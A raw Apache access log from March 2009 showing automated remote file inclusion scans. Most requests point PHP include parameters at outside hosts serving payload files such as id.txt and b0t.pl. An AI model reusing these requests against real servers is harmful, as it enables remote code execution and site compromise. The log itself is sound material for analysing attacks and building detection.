91.93.97.106 - - [07/Mar/2009:08:26:17 -0600] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/id2.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
91.93.97.106 - - [07/Mar/2009:08:26:18 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/id2.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
218.234.18.127 - - [07/Mar/2009:08:28:48 -0600] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.234.18.127 - - [07/Mar/2009:08:28:48 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.234.18.127 - - [07/Mar/2009:08:28:48 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.234.18.127 - - [07/Mar/2009:08:28:48 -0600] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
78.129.138.184 - - [07/Mar/2009:08:29:38 -0600] "GET /logs/access_log.1233878400//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
78.129.138.184 - - [07/Mar/2009:08:29:38 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.129.138.184 - - [07/Mar/2009:08:29:38 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
78.129.138.184 - - [07/Mar/2009:08:29:38 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.129.138.184 - - [07/Mar/2009:08:29:38 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
78.129.138.184 - - [07/Mar/2009:08:29:38 -0600] "GET /logs/access_log.1233878400//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
77.221.130.26 - - [07/Mar/2009:08:30:03 -0600] "GET /logs/errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:08:30:03 -0600] "GET /errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
78.129.138.184 - - [07/Mar/2009:08:30:21 -0600] "GET /logs/access_log.1233792000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
78.129.138.184 - - [07/Mar/2009:08:30:23 -0600] "GET /logs/access_log.1233792000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
77.221.130.26 - - [07/Mar/2009:08:30:32 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:08:30:32 -0600] "GET //index.php?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.97.30.12 - - [07/Mar/2009:08:31:07 -0600] "GET /logs/access_log.1234569600/?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:31:07 -0600] "GET /?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:31:09 -0600] "GET /logs/?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 200 180667 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:31:15 -0600] "GET /?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:31:16 -0600] "GET /logs/access_log.1234569600/?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:31:17 -0600] "GET /logs/?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 200 180667 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:31:23 -0600] "GET /?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:31:23 -0600] "GET /logs/access_log.1234569600/?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:31:25 -0600] "GET /logs/?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 200 180667 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:33:13 -0600] "GET /logs/access_log.1231891200/?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:33:16 -0600] "GET /logs/access_log.1231891200/?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:08:33:52 -0600] "GET /logs/access_log.1231891200/?include_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:08:34:59 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/test.txt?? HTTP/1.1" 404 341 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.93.97.106 - - [07/Mar/2009:08:36:03 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:08:36:03 -0600] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:08:36:05 -0600] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:08:36:15 -0600] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:08:42:12 -0600] "GET //skin/zero_vote/error.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:08:42:12 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:08:42:12 -0600] "GET //skin/zero_vote/error.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:08:42:12 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:08:42:13 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:08:42:13 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.237.76.50 - - [07/Mar/2009:08:43:05 -0600] "GET /logs/access_log.1234828800/main.php?pagina=http://www.kashikicks.ru/osiryID.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
222.237.76.50 - - [07/Mar/2009:08:43:05 -0600] "GET /main.php?pagina=http://www.kashikicks.ru/osiryID.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
222.237.76.50 - - [07/Mar/2009:08:43:05 -0600] "GET /logs/main.php?pagina=http://www.kashikicks.ru/osiryID.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
222.237.76.50 - - [07/Mar/2009:08:43:16 -0600] "GET /logs/access_log.1234051200/main.php?pagina=http://www.kashikicks.ru/osiryID.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
222.237.76.50 - - [07/Mar/2009:08:43:24 -0600] "GET /logs/access_log.1234828800/main.php?pagina=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
222.237.76.50 - - [07/Mar/2009:08:43:24 -0600] "GET /main.php?pagina=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
222.237.76.50 - - [07/Mar/2009:08:43:24 -0600] "GET /logs/main.php?pagina=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
69.61.99.162 - - [07/Mar/2009:08:43:25 -0600] "GET /logs/////kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sportsvideo.org//portal/id2? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
69.61.99.162 - - [07/Mar/2009:08:43:25 -0600] "GET /////kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sportsvideo.org//portal/id2? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.61.99.162 - - [07/Mar/2009:08:43:27 -0600] "GET /logs/////kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sportsvideo.org//portal/id2? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
69.61.99.162 - - [07/Mar/2009:08:43:27 -0600] "GET /////kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sportsvideo.org//portal/id2? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
222.237.76.50 - - [07/Mar/2009:08:43:37 -0600] "GET /logs/access_log.1234051200/main.php?pagina=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
72.89.191.101 - - [07/Mar/2009:08:48:12 -0600] "GET //logs//skin/zero_vote/error.php?dir=http://www.hongik.ac.kr/~aqua/board/whitebbs/lol.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
72.89.191.101 - - [07/Mar/2009:08:48:12 -0600] "GET /logs//logs//skin/zero_vote/error.php?dir=http://www.hongik.ac.kr/~aqua/board/whitebbs/lol.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
213.239.202.227 - - [07/Mar/2009:08:52:06 -0600] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
213.239.202.227 - - [07/Mar/2009:08:52:06 -0600] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.239.202.227 - - [07/Mar/2009:08:52:06 -0600] "GET /logs/access_log.1234742400/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
213.239.202.227 - - [07/Mar/2009:08:52:37 -0600] "GET /logs/access_log.1230595200/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.221.130.26 - - [07/Mar/2009:08:54:27 -0600] "GET /logs//skin/zero_vote/login.php?dir=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:08:54:28 -0600] "GET //skin/zero_vote/login.php?dir=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
208.71.89.60 - - [07/Mar/2009:09:01:06 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:09:01:07 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:09:01:10 -0600] "GET /logs/access_log.1233878400//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
202.53.250.24 - - [07/Mar/2009:09:02:07 -0600] "GET //ask_password.php?dir=http://www.vendo-sito.com//themes/buid.txt%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
202.53.250.24 - - [07/Mar/2009:09:02:07 -0600] "GET /logs//ask_password.php?dir=http://www.vendo-sito.com//themes/buid.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
62.44.70.253 - - [07/Mar/2009:09:02:19 -0600] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:09:02:33 -0600] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:09:02:34 -0600] "GET /logs/access_log.1233792000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:09:02:35 -0600] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:09:02:35 -0600] "GET /logs/access_log.1234742400/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:09:02:39 -0600] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:09:04:04 -0600] "GET /logs/access_log.1230595200/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.129.138.184 - - [07/Mar/2009:09:06:07 -0600] "GET /logs/errors.php?error=http://tronador.ulagos.cl/cursosvirtuales/CARTSIG/id3.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
78.129.138.184 - - [07/Mar/2009:09:06:07 -0600] "GET /errors.php?error=http://tronador.ulagos.cl/cursosvirtuales/CARTSIG/id3.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
85.145.232.237 - - [07/Mar/2009:09:11:17 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://boostserver.com/fantastico/upload/bb/safe1.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
85.145.232.237 - - [07/Mar/2009:09:11:17 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://boostserver.com/fantastico/upload/bb/safe1.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
216.17.106.121 - - [07/Mar/2009:09:16:08 -0600] "GET /logs///vwar/backup/errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
216.17.106.121 - - [07/Mar/2009:09:16:08 -0600] "GET ///vwar/backup/errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
202.214.193.212 - - [07/Mar/2009:09:19:59 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
202.214.193.212 - - [07/Mar/2009:09:19:59 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
202.214.193.212 - - [07/Mar/2009:09:19:59 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
200.93.147.154 - - [07/Mar/2009:09:27:09 -0600] "GET //bbshop/admin/admin.php?_shop_path=http://www.geocities.com/ardiputra81/test.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
74.205.120.232 - - [07/Mar/2009:09:28:50 -0600] "GET /logs//main.php?_shop_path=http://www.familychoicerealtyinc.com/uploads/safe1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
74.205.120.232 - - [07/Mar/2009:09:28:50 -0600] "GET //main.php?_shop_path=http://www.familychoicerealtyinc.com/uploads/safe1.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
213.91.246.64 - - [07/Mar/2009:09:36:16 -0600] "GET //modules/xfsection/modify.php?dir_module=http://freewebsablon.hu/images/info.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
213.91.246.64 - - [07/Mar/2009:09:36:16 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://freewebsablon.hu/images/info.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
64.6.241.16 - - [07/Mar/2009:09:40:36 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.slwcs.org/forms/use/vacancies/files/b0t.pl?? HTTP/1.1" 404 312 "-""libwww-perl/5.814"
64.6.241.16 - - [07/Mar/2009:09:40:36 -0600] "GET ///vwar/backup/errors.php?error=http://www.slwcs.org/forms/use/vacancies/files/b0t.pl?? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
74.205.120.232 - - [07/Mar/2009:09:42:59 -0600] "GET /logs//main.php?_shop_path=http://www.familychoicerealtyinc.com/uploads/safe1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
74.205.120.232 - - [07/Mar/2009:09:42:59 -0600] "GET //main.php?_shop_path=http://www.familychoicerealtyinc.com/uploads/safe1.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
65.55.208.131 - - [07/Mar/2009:09:44:04 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [07/Mar/2009:09:44:04 -0600] "GET /logs/access_log.1185235200 HTTP/1.1" 200 1289 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
84.19.182.112 - - [07/Mar/2009:09:44:11 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:09:44:11 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.13.208.123 - - [07/Mar/2009:09:46:00 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
69.13.208.123 - - [07/Mar/2009:09:46:00 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
87.106.16.155 - - [07/Mar/2009:09:46:27 -0600] "GET /logs/access_log.1234137600//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://racrew.us/sophie/idfx1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
87.106.16.155 - - [07/Mar/2009:09:46:27 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://racrew.us/sophie/idfx1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.106.16.155 - - [07/Mar/2009:09:46:27 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://racrew.us/sophie/idfx1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.89.191.101 - - [07/Mar/2009:09:46:37 -0600] "GET //?_zb_path=http://www.hongik.ac.kr/~aqua/board/whitebbs/lol.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
72.89.191.101 - - [07/Mar/2009:09:46:37 -0600] "GET /logs//?_zb_path=http://www.hongik.ac.kr/~aqua/board/whitebbs/lol.txt??? HTTP/1.1" 200 180672 "-""libwww-perl/5.79"
84.19.182.112 - - [07/Mar/2009:09:46:38 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:09:46:38 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
216.17.106.121 - - [07/Mar/2009:09:50:37 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
216.17.106.121 - - [07/Mar/2009:09:50:37 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
84.19.182.112 - - [07/Mar/2009:09:52:47 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
84.19.182.112 - - [07/Mar/2009:09:52:47 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.182.83.68 - - [07/Mar/2009:09:56:33 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://racrew.us/sophie/idfx1.txt?? HTTP/1.0" 404 338 "-""Mozilla/5.0"
64.182.83.68 - - [07/Mar/2009:09:56:33 -0600] "GET /logs/access_log.1234137600//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://racrew.us/sophie/idfx1.txt?? HTTP/1.0" 404 360 "-""Mozilla/5.0"
64.182.83.68 - - [07/Mar/2009:09:56:33 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://racrew.us/sophie/idfx1.txt?? HTTP/1.0" 404 333 "-""Mozilla/5.0"
65.55.230.164 - - [07/Mar/2009:10:04:50 -0600] "GET /logs/access_log.1228262400 HTTP/1.1" 200 12042 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [07/Mar/2009:10:11:01 -0600] "GET /logs/access_log.1122249600 HTTP/1.1" 200 666 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [07/Mar/2009:10:11:01 -0600] "GET /logs/access_log.1130976000 HTTP/1.1" 200 1307 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.101.4.49 - - [07/Mar/2009:10:33:03 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Mar/2009:10:33:03 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
148.245.102.115 - - [07/Mar/2009:10:42:22 -0600] "GET /logs/lostpasswd.php?env[include_prefix]=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
148.245.102.115 - - [07/Mar/2009:10:42:25 -0600] "GET /lostpasswd.php?env[include_prefix]=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
201.232.54.48 - - [07/Mar/2009:10:48:28 -0600] "GET /logs//classes/adodbt/sql.php?classes_dir=http://tronador.ulagos.cl/cursosvirtuales/CARTSIG/group/copyright.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
201.232.54.48 - - [07/Mar/2009:10:48:28 -0600] "GET /logs/access_log.1233446400//classes/adodbt/sql.php?classes_dir=http://tronador.ulagos.cl/cursosvirtuales/CARTSIG/group/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
207.58.164.77 - - [07/Mar/2009:11:00:28 -0600] "GET /logs//bbshop/shop/main.php?_shop_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.58.164.77 - - [07/Mar/2009:11:00:28 -0600] "GET /logs/access_log.1232755200//bbshop/shop/main.php?_shop_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.58.164.77 - - [07/Mar/2009:11:00:28 -0600] "GET //bbshop/shop/main.php?_shop_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
207.58.164.77 - - [07/Mar/2009:11:00:32 -0600] "GET /logs/access_log.1228608000//bbshop/shop/main.php?_shop_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.225.253.109 - - [07/Mar/2009:11:10:19 -0600] "GET /logs/access_log.1230768000/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.810"
211.236.242.164 - - [07/Mar/2009:11:12:54 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://imagehut.ws/images/baner.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
